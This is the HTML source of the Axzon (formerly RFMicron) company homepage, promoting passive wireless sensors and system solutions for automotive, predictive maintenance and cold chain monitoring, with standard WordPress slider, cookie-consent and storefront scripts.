menu-item-type-custom menu-item-object-custom menu-item-357"><a href="http://rfmicron.com/official-blog/"><span>Company Blog</span></a></li> <li id="menu-item-358" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-358"><a href="http://community.rfmicron.com/white-papers/"><span>White Papers</span></a></li> <li id="menu-item-381" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-381"><a href="http://community.rfmicron.com/application-notes/"><span>Application Notes</span></a></li> <li id="menu-item-382" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-382"><a href="http://community.rfmicron.com/instruction-guides/"><span>Instruction Guides</span></a></li> </ul> </li> <li id="menu-item-20" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-20"><a href="#"><span>Buy/Sample</span></a> <ul class="sub-menu"> <li id="menu-item-900" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-900"><a href="https://axzon.com/buy-systems-kits-and-sensors/"><span>Buy Systems, Kits and Sensors</span></a></li> <li id="menu-item-624" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-624"><a href="https://axzon.com/sales-and-distributors/"><span>Sales / Distributors</span></a></li> </ul> </li> <li id="menu-item-21" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-21"><a href="#"><span>Company</span></a> <ul class="sub-menu"> <li id="menu-item-1029" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1029"><a href="https://axzon.com/company-blog/"><span>Company Blog</span></a></li> <li id="menu-item-497" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-497"><a href="https://axzon.com/news/"><span>News</span></a></li> <li id="menu-item-486" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-486"><a href="https://axzon.com/about-us/"><span>About Us</span></a></li> <li id="menu-item-631" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-631"><a href="https://axzon.com/careers-at-axzon/"><span>Careers</span></a></li> <li id="menu-item-493" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-493"><a href="https://axzon.com/contact-us/"><span>Contact Us</span></a></li> <li id="menu-item-1253" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1253"><a href="https://axzon.com/patents/"><span>Patents</span></a></li> <li id="menu-item-375" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-375"><a href="https://axzon.com/legal-notices/"><span>Legal Notices</span></a></li> <li id="menu-item-376" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-376"><a href="#"><span>Policies</span></a> <ul class="sub-menu"> <li id="menu-item-560" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-560"><a href="https://axzon.com/quality-policy/"><span>Quality Policy</span></a></li> <li id="menu-item-569" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-569"><a href="https://axzon.com/conflict-minerals-policy/"><span>Conflict Minerals Policy</span></a></li> <li id="menu-item-378" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-378"><a href="https://axzon.com/privacy-cookie-and-data-usage-policy/"><span>Privacy Policy</span></a></li> </ul> </li> </ul> </li> </ul></div> </div> <!-- end dropdown-holder --> </nav> <!-- end top-main-menu --> </header> <!-- end top-wrapper --> <div class="clear"></div> <a id="sticky-menu-logo" href="https://axzon.com" title="Axzon website"><img height="40" src="https://axzon.com/wp-content/uploads/2018/04/Axzon-logo-with-tagline-RFM004_optimized-e1522949835793.png" alt="logo" /></a> <div id="rev-slider-header"> <link href="https://fonts.googleapis.com/css?family=Open+Sans:800%7CRoboto:900" rel="stylesheet" property="stylesheet" type="text/css" media="all"> <div id="rev_slider_1_1_wrapper" class="rev_slider_wrapper fullwidthbanner-container" data-source="gallery" style="margin:0px auto;background:transparent;padding:0px;margin-top:0px;margin-bottom:0px;"> <!-- START REVOLUTION SLIDER 5.4.8.2 fullwidth mode --> <div id="rev_slider_1_1" class="rev_slider fullwidthabanner" style="display:none;" data-version="5.4.8.2"> <ul> <!-- SLIDE --> <li data-index="rs-1" data-transition="fade" data-slotamount="default" data-hideafterloop="0" data-hideslideonmobile="off" data-easein="default" data-easeout="default" data-masterspeed="300" data-rotate="0" data-saveperformance="off" data-title="Slide" data-param1="" data-param2="" data-param3="" data-param4="" data-param5="" data-param6="" data-param7="" data-param8="" data-param9="" data-param10="" data-description=""> <!-- MAIN IMAGE --> <img src="https://axzon.com/wp-content/uploads/2018/04/binary-eye-1675898271500x320.png" alt="" title="binary-eye-1675898271500&#215;320" width="1500" height="320" data-bgposition="center center" data-bgfit="cover" data-bgrepeat="no-repeat" class="rev-slidebg" data-no-retina> <!-- LAYERS --> <!-- LAYER NR. 1 --> <div class="tp-caption rev_group" id="slide-1-layer-18" data-x="['left','left','left','left']" data-hoffset="['165','65','75','75']" data-y="['top','top','top','top']" data-voffset="['74','74','12','12']" data-width="['507','507','357','357']" data-height="['158','158','121','121']" data-whitespace="nowrap" data-type="group" data-responsive_offset="on" data-frames='[{"delay":10,"speed":300,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"}]' data-margintop="[0,0,0,0]" data-marginright="[0,0,0,0]" data-marginbottom="[0,0,0,0]" data-marginleft="[0,0,0,0]" data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 5; min-width: 507px; max-width: 507px; max-width: 158px; max-width: 158px; white-space: nowrap; font-size: 20px; line-height: 22px; font-weight: 400; color: #ffffff; letter-spacing: 0px;"> <!-- LAYER NR. 2 --> <div class="tp-caption tp-resizeme" id="slide-1-layer-13" data-x="['left','left','left','left']" data-hoffset="['40','40','40','40']" data-y="['top','top','top','top']" data-voffset="['14','14','14','14']" data-fontsize="['28','28','18','18']" data-width="none" data-height="none" data-whitespace="nowrap" data-type="text" data-responsive_offset="on" data-frames='[{"delay":"+0","speed":300,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"}]' data-margintop="[0,0,0,0]" data-marginright="[0,0,0,0]" data-marginbottom="[0,0,0,0]" data-marginleft="[0,0,0,0]" data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 6; white-space: nowrap; font-size: 28px; line-height: 22px; font-weight: 800; color: #fc9a19; letter-spacing: 0px;font-family:Open Sans;">We connect the unconnected </div> <!-- LAYER NR. 3 --> <div class="tp-caption tp-resizeme" id="slide-1-layer-15" data-x="['left','left','left','left']" data-hoffset="['82','82','77','77']" data-y="['top','top','top','top']" data-voffset="['48','48','38','38']" data-fontsize="['28','28','18','18']" data-width="none" data-height="none" data-whitespace="nowrap" data-type="text" data-responsive_offset="on" data-frames='[{"delay":"+0","speed":300,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"}]' data-margintop="[0,0,0,0]" data-marginright="[0,0,0,0]" data-marginbottom="[0,0,0,0]" data-marginleft="[0,0,0,0]" data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 7; white-space: nowrap; font-size: 28px; line-height: 22px; font-weight: 800; color: #fc9a19; letter-spacing: 0px;font-family:Open Sans;">to sense data reliably </div> <!-- LAYER NR. 4 --> <div class="tp-caption tp-resizeme" id="slide-1-layer-16" data-x="['left','left','left','left']" data-hoffset="['12','12','21','21']" data-y="['top','top','top','top']" data-voffset="['81','81','64','64']" data-fontsize="['28','28','18','18']" data-width="none" data-height="none" data-whitespace="nowrap" data-type="text" data-responsive_offset="on" data-frames='[{"delay":"+0","speed":300,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"}]' data-margintop="[0,0,0,0]" data-marginright="[0,0,0,0]" data-marginbottom="[0,0,0,0]" data-marginleft="[0,0,0,0]" data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 8; white-space: nowrap; font-size: 28px; line-height: 22px; font-weight: 800; color: #fc9a19; letter-spacing: 0px;font-family:Open Sans;">and accurately to deliver insights </div> <!-- LAYER NR. 5 --> <div class="tp-caption tp-resizeme" id="slide-1-layer-17" data-x="['left','left','left','left']" data-hoffset="['64','64','63','63']" data-y="['top','top','top','top']" data-voffset="['113','113','90','90']" data-fontsize="['28','28','18','18']" data-width="none" data-height="none" data-whitespace="nowrap" data-type="text" data-responsive_offset="on" data-frames='[{"delay":"+0","speed":300,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"}]' data-margintop="[0,0,0,0]" data-marginright="[0,0,0,0]" data-marginbottom="[0,0,0,0]" data-marginleft="[0,0,0,0]" data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 9; white-space: nowrap; font-size: 28px; line-height: 22px; font-weight: 800; color: #fc9a19; letter-spacing: 0px;font-family:Open Sans;">into business operations </div> </div> <!-- LAYER NR. 6 --> <div class="tp-caption rev-btn rev-hiddenicon " id="slide-1-layer-25" data-x="['left','left','left','left']" data-hoffset="['427','351','231','231']" data-y="['top','top','top','top']" data-voffset="['234','232','133','133']" data-width="none" data-height="none" data-whitespace="nowrap" data-type="button" data-actions='[{"event":"click","action":"simplelink","target":"_self","url":"https:\/\/axzon.com\/sensing-data-insights\/","delay":""}]' data-responsive_offset="on" data-responsive="off" data-frames='[{"delay":0,"speed":300,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"},{"frame":"hover","speed":"0","ease":"Linear.easeNone","to":"o:1;rX:0;rY:0;rZ:0;z:0;","style":"c:rgba(0,0,0,1);bs:solid;bw:0 0 0 0;"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[12,12,12,12]" data-paddingright="[35,35,35,35]" data-paddingbottom="[12,12,12,12]" data-paddingleft="[35,35,35,35]" style="z-index: 10; white-space: nowrap; font-size: 15px; line-height: 15px; font-weight: 900; color: rgba(255,255,255,1); letter-spacing: px;font-family:Roboto;text-transform:uppercase;background-color:rgb(214,0,21);border-color:rgba(0,0,0,1);border-radius:30px 30px 30px 30px;outline:none;box-shadow:none;box-sizing:border-box;-moz-box-sizing:border-box;-webkit-box-sizing:border-box;letter-spacing:1px;cursor:pointer;">Learn More <i class="fa-icon-chevron-right"></i> </div> </li> </ul> <div class="tp-bannertimer tp-bottom" style="visibility: hidden !important;"></div> </div> <script>var htmlDiv = document.getElementById("rs-plugin-settings-inline-css"); var htmlDivCss=""; if(htmlDiv) { htmlDiv.innerHTML = htmlDiv.innerHTML + htmlDivCss; }else{ var htmlDiv = document.createElement("div"); htmlDiv.innerHTML = "<style>" + htmlDivCss + "</style>"; document.getElementsByTagName("head")[0].appendChild(htmlDiv.childNodes[0]); } </script> <script type="text/javascript"> if (setREVStartSize!==undefined) setREVStartSize( {c: '#rev_slider_1_1', responsiveLevels: [1240,1024,778,778], gridwidth: [1240,1024,778,778], gridheight: [450,450,300,300], sliderLayout: 'fullwidth'}); var revapi1, tpj; (function() { if (!/loaded|interactive|complete/.test(document.readyState)) document.addEventListener("DOMContentLoaded",onLoad); else onLoad(); function onLoad() { if (tpj===undefined) { tpj = jQuery; if("off" == "on") tpj.noConflict();} if(tpj("#rev_slider_1_1").revolution == undefined){ revslider_showDoubleJqueryError("#rev_slider_1_1"); }else{ revapi1 = tpj("#rev_slider_1_1").show().revolution({ sliderType:"hero", jsFileLocation:"//axzon.com/wp-content/plugins/revslider/public/assets/js/", sliderLayout:"fullwidth", dottedOverlay:"none", delay:9000, responsiveLevels:[1240,1024,778,778], visibilityLevels:[1240,1024,778,778], gridwidth:[1240,1024,778,778], gridheight:[450,450,300,300], lazyType:"none", shadow:0, spinner:"spinner0", autoHeight:"off", disableProgressBar:"on", hideThumbsOnMobile:"off", hideSliderAtLimit:0, hideCaptionAtLimit:0, hideAllCaptionAtLilmit:0, debugMode:false, fallbacks: { simplifyAll:"off", disableFocusListener:false, } }); }; /* END OF revapi call */ }; /* END OF ON LOAD FUNCTION */ }()); /* END OF WRAPPING FUNCTION */ </script> </div><!-- END REVOLUTION SLIDER --> </div> <!-- end rev-slider-header --> <div class="clear"></div> <section id="home-page-content"> <div id="content-container" class="container_24"> <main id="main-content" role="main" class="grid_24"> <div class="main-content-padding"> <article class="post-5 page type-page status-publish hentry" id="post-5"> <div class="entry"> <div style="text-align:center;"><div class="custom-frame-wrapper aligncenter frame-shadow"><div class="custom-frame-inner-wrapper"><div class="custom-frame-padding"><a href="https://axzon.com/rfmicron-transformation/"><img class="alignnone" title="RFMicron is now Axzon-April 2018_opt" src="https://axzon.com/wp-content/uploads/2018/04/RFMicron-is-now-Axzon_April-2018_optimize.png" alt="" width="494" height="102" /></a></div></div></div></div> <!-- Michael Falcon has temporarily commented out this "Upcoming Events" section. This section will be re-added when more conferences are scheduled. <h3 style="margin-bottom: -15px; text-align: center;"><strong><em><span style="font-size: 36px; color: #636466; line-height: 1.2;">Upcoming Events</span></em></strong></h3> <a href="https://electronica.de/index.html" target="_blank" rel="noopener"><img class="aligncenter wp-image-1130 size-full" src="https://axzon.com/wp-content/uploads/2018/10/2018-electronica-logo.png" alt="" width="600" height="105" srcset="https://axzon.com/wp-content/uploads/2018/10/2018-electronica-logo.png 600w, https://axzon.com/wp-content/uploads/2018/10/2018-electronica-logo-300x53.png 300w" sizes="(max-width: 600px) 100vw, 600px" /></a> --><br /> <!-- START OF "Explore Our Industries" BLOCK --></p> <style type="text/css"> #content-block-background-1486 { background-image: url(); background-position: center bottom; background-repeat: repeat-x; background-color: #FFFFFF; background-attachment: scroll; background-size: auto; } #content-block-body-1486 { padding: 10px 0 10px; color: #444444; } .content-block-body { margin-left: auto; margin-right: auto; position: relative; } </style> <style type="text/css"> #wrapper-1 { overflow-x: hidden; } #content-block-background-1486 { margin: 0 -10000px; padding: 0 10000px; } </style> <div class="clear"></div> <div id="content-block-background-1486" class="content-block-background "> <div id="content-block-body-1486" class="content-block-body"> <div class="clear"></div> <div style="text-align: center;"> <h4 style="margin-bottom: -15px;"><strong><em><span style="font-size: 36px; color: #636466; line-height: 1.2;">Explore Our Industries</span></em></strong></h4> <h5 style="margin-bottom: 5px;"></h5> </div> <div style="margin: 20px 0 20px;"> <div class="one_third"> <div style="text-align: center;"> <h3 style="margin: 0px auto; padding-bottom: 0px; color: #1569d6; font-weight: normal;">Automotive</h3> </div> <p><!-- ------------ AUTOMOTIVE IMAGE 200x300px --------- --><br /> <img class="wp-image-39 size-thumbnail aligncenter" src="https://axzon.com/wp-content/uploads/2018/04/icon-automotive-3d.png" alt="Icon image of a vehicle being built" width="142" height="142" /><br /> Our sensing solutions bring SMART manufacturing tools to automotive assembly lines. Real-time data helps find assembly issues before vehicles leave the factory.</p> <p><!-- ------------ BUTTON --------- --><br /> <div class="align-btn-center"><a class="flat-custom-button" href="https://axzon.com/automotive-solutions/" title="Click for more information on automotive solutions"><span style="padding:10px 20px; background-color:#fc9a19; border:1px solid #fc9a19; color:#ffffff; font-size:14px;">Learn more</span></a></div> <p>&nbsp;</p> </div> <div class="one_third"> <div style="text-align: center;"> <h3 style="margin: 0 auto; padding-bottom: 0; color: #1569d6; font-weight: normal;">Predictive Maintenance</h3> </div> <p><!-- ------------ PREDICTIVE MAINTENANCE IMAGE 200x300px --------- --><br /> <img class="wp-image-39 size-thumbnail aligncenter" src="https://axzon.com/wp-content/uploads/2018/04/icon-predictive-maintenance-3d.png" alt="Icon image of a motor" width="142" height="142" /><br /> Our predictive maintenance solutions keep maintenance teams informed about factory and plant equipment condition so they see issues coming before failure strikes.</p> <p><!-- ------------ BUTTON --------- --><br /> <div class="align-btn-center"><a class="flat-custom-button" href="https://axzon.com/predictive-maintenance-solutions/" title="Click for more information on predictive maintenance"><span style="padding:10px 20px; background-color:#fc9a19; border:1px solid #fc9a19; color:#ffffff; font-size:14px;">Learn more</span></a></div> <p>&nbsp;</p> </div> <div class="one_third last_column"> <div style="text-align: center;"> <h3 style="margin: 0 auto; padding-bottom: 0; color: #1569d6; font-weight: normal;">Cold Chain</h3> </div> <p><!-- ------------ COLD CHAIN IMAGE 200x300px --------- --><br /> <img class="wp-image-39 size-thumbnail aligncenter" src="https://axzon.com/wp-content/uploads/2018/04/icon-cold-chain-3d.png" alt="Icon image of a truck" width="142" height="142" /><br /> Our sensors monitor temperature let you monitor temperature-sensitive pharmaceuticals and other materials as they are transported and stored.</p> <p><!-- ------------ BUTTON --------- --><br /> <div class="align-btn-center"><a class="flat-custom-button" href="https://axzon.com/cold-chain-solutions/" title="Click for more information on cold chain monitoring"><span style="padding:10px 20px; background-color:#fc9a19; border:1px solid #fc9a19; color:#ffffff; font-size:14px;">Learn more</span></a></div> <p>&nbsp;</p> </div> <div class="clear"></div> </div> </div> <div class="clear"></div> <div class="clear"></div> <p><!-- ********************* START OF "Explore our Solutions" BLOCK ************** ******************************************************************************** ************************** 3-Wide IMAGE-TITLE_BUTTON *************************** **************************************************************************** --><br /> <style type="text/css"> #content-block-background-1743 { background-image: url(); background-position: center top; background-repeat: no-repeat; background-color: #1569d6; background-attachment: fixed; background-size: auto; } #content-block-body-1743 { padding: 15px 0; color: #ffffff; } .content-block-body { margin-left: auto; margin-right: auto; position: relative; } </style> <style type="text/css"> #wrapper-1 { overflow-x: hidden; } #content-block-background-1743 { margin: 0 -10000px; padding: 0 10000px; } </style> <script type="text/javascript"> // <![CDATA[ jQuery(document).ready(function($){ if( ! $("body").hasClass( "mobile-detected" ) ){ $("#content-block-background-"+1743).each(function(){ var $bgobj = $(this); // Assigning the object. var xPos = 'center'; // x bg position value from the user shortcode. $(window).scroll(function() { var yPos = -($(window).scrollTop() / 3); // Put together our final background position. var coords = xPos+' '+yPos+'px'; // Move the background. $bgobj.css({ backgroundPosition: coords }); }); }); } }); // ]]&gt; </script> <div class="clear"></div> <div id="content-block-background-1743" class="content-block-background "> <div id="content-block-body-1743" class="content-block-body"> <div class="clear"></div> <div style="text-align: center;"> <h4 style="margin-bottom: -15px;"><strong><em><span style="font-size: 36px; color: #ffffff; line-height: 1.2;">Explore Our Solutions<br /> </span></em></strong></h4> </div> <div class="one_third"> <!-- ------------ SENSOR IMAGE 200x300px --------- --><br /> <img class="alignnone size-medium wp-image-1223" title="Click the button to learn more about our sensors" src="https://axzon.com/wp-content/uploads/2018/04/sensors-image-300x200.png" alt="Image of sensors using Smart Passive Sensing" width="300" height="200" /></p> <p style="color: #ffffff;">Sensors</p> <p>Learn more about our full range of sensors from labels styles to ruggedized industrials.<div class="clear"></div> <p><!-- ------------ BUTTON --------- --><br /> <a class="flat-custom-button align-btn-left" href="https://axzon.com/sensors" title="Click for more information about sensors"><span style="padding:10px 20px; background-color:#fc9a19; border:1px solid #fc9a19; color:#ffffff; font-size:14px;">Learn more</span></a> <p>&nbsp;</p> </div> <div class="one_third"> <!-- ------------ SYSTEMS IMAGE 200x300px --------- --><br /> <img class="alignnone size-medium wp-image-1223" title="Click the button to learn more about systems" src="https://axzon.com/wp-content/uploads/2018/04/RFM5117-300x200.png" alt="Image of system solutions" width="300" height="200" /></p> <p style="color: #ffffff;">System Solutions</p> <p>Learn more about complete systems that deliver data and insights right out of the box.<div class="clear"></div> <p><!-- ------------ BUTTON --------- --><br /> <a class="flat-custom-button align-btn-left" href="https://axzon.com/system-solutions-for-wireless-sensors" title="Click for more information on complete systems"><span style="padding:10px 20px; background-color:#fc9a19; border:1px solid #fc9a19; color:#ffffff; font-size:14px;">Learn more</span></a> <p>&nbsp;</p> </div> <div class="one_third last_column"> <!-- ------------ SOFTWARE IMAGE 200x300px --------- --><br /> <img class="alignnone size-medium wp-image-1223" title="Click the button to learn more about software" src="https://axzon.com/wp-content/uploads/2018/04/software-300x200.png" alt="Image of software options" width="300" height="200" /></p> <p style="color: #ffffff;">Software Solutions</p> <p>Put our algorithms to work turning your raw sensor data into trusted business insights.<br /> <div class="clear"></div> <p><!-- ------------ BUTTON --------- --><br /> <a class="flat-custom-button align-btn-left" href="https://axzon.com/industrial-iot-sensor-platform/" title="Software simplifies getting data to your applications"><span style="padding:10px 20px; background-color:#fc9a19; border:1px solid #fc9a19; color:#ffffff; font-size:14px;">Learn more</span></a> </div> <div class="clear"></div> </div> </div> <div class="clear"></div> <div class="clear"></div> <p><!-- *************** Content block for "Other Resources" ***************** --><br /> <style type="text/css"> #content-block-background-1311 { background-image: url(); background-position: center bottom; background-repeat: repeat-x; background-color: #FFFFFF; background-attachment: scroll; background-size: auto; } #content-block-body-1311 { padding: 10px 0 10px; color: #444444; } .content-block-body { margin-left: auto; margin-right: auto; position: relative; } </style> <style type="text/css"> #wrapper-1 { overflow-x: hidden; } #content-block-background-1311 { margin: 0 -10000px; padding: 0 10000px; } </style> <div class="clear"></div> <div id="content-block-background-1311" class="content-block-background "> <div id="content-block-body-1311" class="content-block-body"> <div class="clear"></div> <div style="text-align: center;"> <h4 style="margin-bottom: -15px;"><strong><em><span style="font-size: 36px; color: #636466; line-height: 1.2;">Other Resources</span></em></strong></h4> </div> <div style="margin: 20px 0 20px;"> <div class="one_half"> <!-- BLOG ICON --><br /> <img class="wp-image-39 size-thumbnail aligncenter" style="border: 1px solid gray;" src="https://axzon.com/wp-content/uploads/2018/04/blog-icon-496387738-300x300-01-2.png" alt="Image of blog icon" width="300" height="300" /></p> <div style="text-align: center;"> <h3 style="margin: 0 auto; padding-bottom: 0; color: #1569d6; font-weight: normal;"><a href="http://rfmicron.com/official-blog/">Blog</a></h3> </div> </div> <div class="one_half last_column"> <!-- COMMUNITY ICON --><br /> <img class="wp-image-39 size-thumbnail aligncenter" style="border: 1px solid gray;" src="https://axzon.com/wp-content/uploads/2018/04/community-illustration-943330202-300x300-1.png" alt="image of community icon" width="300" height="300" /></p> <div style="text-align: center;"> <h3 style="margin: 0 auto; padding-bottom: 0; color: #1569d6; font-weight: normal;"><a href="http://community.rfmicron.com/">Community Forum</a></h3> </div> </div> <div class="clear"></div> </div> </div> <div class="clear"></div> </div> </div> </div> </article> <div class="clear"></div> </div><!-- end main-content-padding --> </main><!-- end main-content --> </div><!-- end content-container --> <div class="clear"></div> </section><!-- end page-content --> <div class="clear"></div> <section id="bottom-bg"> <div id="bottom" class="container_24"> <div class="bottom-content-padding"> <div id='bottom_2' class='one_half'><div class='column-content-wrapper'><div class="bottom-col-content widget_black_studio_tinymce substitute_widget_class"><h3 class="bottom-col-title">Axzon (formerly RFMicron)</h3><div class="textwidget"><p>3700 N Capital of Texas Hwy<br /> Suite 570<br /> Austin, TX 78746<br /> Tel: (512) 535-4647</p> </div></div></div></div><!-- end bottom_2 --><div id='bottom_3' class='one_half last_column'><div class='column-content-wrapper'><div class="bottom-col-content widget_black_studio_tinymce substitute_widget_class"><h3 class="bottom-col-title">Support</h3><div class="textwidget"><p>Datasheets &amp; white papers are now available in Chinese.</p> <ul> <li><a href="http://community.rfmicron.com/">Community</a></li> <li><a href="http://community.rfmicron.com/wp-login.php">Sign In / Register</a></li> </ul> </div></div></div></div><!-- end bottom_3 --> </div><!-- end bottom-content-padding --> </div><!-- end bottom --> </section><!-- end bottom-bg --> <div class="clear"></div> <footer id="footer-bg"> <div id="footer" class="container_24 footer-top"> <div id="footer_text" class="grid_20"> © 2019 <strong>RFMicron, Inc. d/b/a Axzon. All Rights Reserved. </strong></div> <a href="#" id="back-to-top-fixed" style="display: none;"><span class="fa fa-angle-up"></span><span class="back-to-top">Back to Top</span></a> </div> </footer><!-- end footer-bg --> <div class="clear"></div> </div><!-- end wrapper-1 --> <div class="gdpr gdpr-overlay"></div> <div class="gdpr gdpr-privacy-bar" style="display:none;"> <div class="gdpr-wrapper"> <div class="gdpr-content"> <p>We use cookies to offer you a better browsing experience, analyze site traffic, personalize content, and serve targeted advertisements. Read about how we use cookies and how you can control them by clicking "Privacy Preferences". If you continue to use this site, you consent to our use of cookies.</p> </div> <div class="gdpr-right"> <div class="gdpr-buttons"> <button class="gdpr-preferences" type="button">Privacy Preferences</button> <button class="gdpr-agreement" type="button">I Agree</button> </div> <span class="gdpr-close"></span> </div> </div> </div> <div class="gdpr gdpr-privacy-preferences"> <div class="gdpr-wrapper"> <form method="post" class="gdpr-privacy-preferences-frm"> <input type="hidden" name="action" value="gdpr_update_privacy_preferences"> <input type="hidden" id="update-privacy-preferences-nonce" name="update-privacy-preferences-nonce" value="0955e14b17" /><input type="hidden" name="_wp_http_referer" value="/" /> <header> <div class="gdpr-box-title"> <h3>Privacy Preference Center</h3> <span class="gdpr-close"></span> </div> </header> <div class="gdpr-mobile-menu"> <button type="button">Options</button> </div> <div class="gdpr-content"> <div class="gdpr-tabs"> <ul class=""> <li><button type="button" class="gdpr-tab-button gdpr-active" data-target="gdpr-consent-management">Consent Management</button></li> <li><button type="button" class="gdpr-tab-button gdpr-cookie-settings" data-target="strictly-necessary">Cookie Settings</button> <ul class="gdpr-subtabs"> <li><button type="button" data-target="strictly-necessary" >Strictly Necessary</button></li> </ul> </li> </ul> <ul class="gdpr-policies"> </ul> </div> <div class="gdpr-tab-content"> <div class="gdpr-consent-management gdpr-active"> <header> <h4>Consent Management</h4> </header> <div class="gdpr-info"> <p>When you visit any website, it may store or retrieve information on your browser, mostly in the form of cookies. This information might be about you, your preferences or your device and is mostly used to make the site work as you expect it to. The information does not usually directly identify you, but it can give you a more personalized web experience.</p> <div class="gdpr-cookies-used"> <div class="gdpr-cookie-title"> <p>Privacy Policy</p> <label class="gdpr-switch"> <input type="checkbox" name="user_consents[]" value="privacy-policy" checked> <span class="gdpr-slider round"></span> <span class="gdpr-switch-indicator-on">ON</span> <span class="gdpr-switch-indicator-off">OFF</span> </label> </div> <div class="gdpr-cookies"> <span>You read and agreed to our <a href="" target="_blank">Privacy Policy</a>.</span> </div> </div> </div> </div> <div class="strictly-necessary"> <header> <h4>Strictly Necessary</h4> </header><!-- /header --> <div class="gdpr-info"> <p>Cookies that are necessary for the site to function properly. Without these cookies, services like an ecommerce shopping cart cannot be provided.</p> <div class="gdpr-cookies-used"> <div class="gdpr-cookie-title"> <p>Cookies Used</p> <label class="gdpr-switch"> <input type="checkbox" class="gdpr-cookie-category" data-category="strictly-necessary" name="approved_cookies[]" value="[&quot;PHPSESSID&quot;,&quot;gdrp&quot;,&quot;_dc_gtm&quot;,&quot;cart_in_use&quot;]" checked='checked'> <span class="gdpr-slider round"></span> <span class="gdpr-switch-indicator-on">ON</span> <span class="gdpr-switch-indicator-off">OFF</span> </label> </div> <div class="gdpr-cookies"> <span>PHPSESSID, gdrp, _dc_gtm, cart_in_use</span> </div> </div> <div class="gdpr-cookies-used"> <div class="gdpr-cookie-title"> <p>google.com</p> <a href="https://tools.google.com/dlpage/gaoptout" target="_blank" class="gdpr-button">Opt Out</a> </div> <div class="gdpr-cookies"> <span>_ga, _gid</span> </div> </div> </div> </div> </div> <input type="hidden" name="all_cookies" value="[&quot;PHPSESSID&quot;,&quot;gdrp&quot;,&quot;_dc_gtm&quot;,&quot;cart_in_use&quot;]"> </div> <footer> <input type="submit" value="Save Preferences"> </footer> </form> </div> </div> <div class="gdpr gdpr-general-confirmation"> <div class="gdpr-wrapper"> <header> <div class="gdpr-box-title"> <h3></h3> <span class="gdpr-close"></span> </div> </header> <div class="gdpr-content"> <p></p> </div> <footer> <button class="gdpr-ok">OK</button> </footer> </div> </div> <script type="text/javascript"> jQuery(document).ready(function($) { $(function() { $('[class*=eStore]').find('a[rel*=lightbox]').lightBox({ imageLoading: 'https://axzon.com/wp-content/plugins/wp-cart-for-digital-products/images/lightbox/lightbox-ico-loading.gif', imageBtnClose: 'https://axzon.com/wp-content/plugins/wp-cart-for-digital-products/images/lightbox/lightbox-btn-close.gif', imageBtnPrev: 'https://axzon.com/wp-content/plugins/wp-cart-for-digital-products/images/lightbox/lightbox-btn-prev.gif', imageBtnNext: 'https://axzon.com/wp-content/plugins/wp-cart-for-digital-products/images/lightbox/lightbox-btn-next.gif', imageBlank: 'https://axzon.com/wp-content/plugins/wp-cart-for-digital-products/images/lightbox/lightbox-blank.gif', txtImage: 'Image', txtOf: 'of' }); }); }); </script> <script type="text/javascript"> jQuery.noConflict(); jQuery(document).ready(function($) { $(function() { if ($('.t-and-c').length ) { //Terms and condtions is being used so apply validation }else{ return; } $('.t_and_c_error').hide(); $(".t-and-c").click(function(){ if($(".t-and-c").is(':checked')){ $.cookie("eStore_submit_payment","true",{path: '/'}); $('.t_and_c_error').hide(); } else{ $.cookie("eStore_submit_payment","false",{path: '/'}); } }); $(".eStore_paypal_checkout_button").click(function(e){ if(!$(".t-and-c").is(':checked')){ $('.t_and_c_error').show(); e.preventDefault(); } }); $(".eStore_buy_now_button").click(function(e){ if(!$(".t-and-c").is(':checked')){ $('.t_and_c_error').show(); e.preventDefault(); } }); $(".eStore_subscribe_button").click(function(e){ if(!$(".t-and-c").is(':checked')){ $('.t_and_c_error').show(); e.preventDefault(); } }); 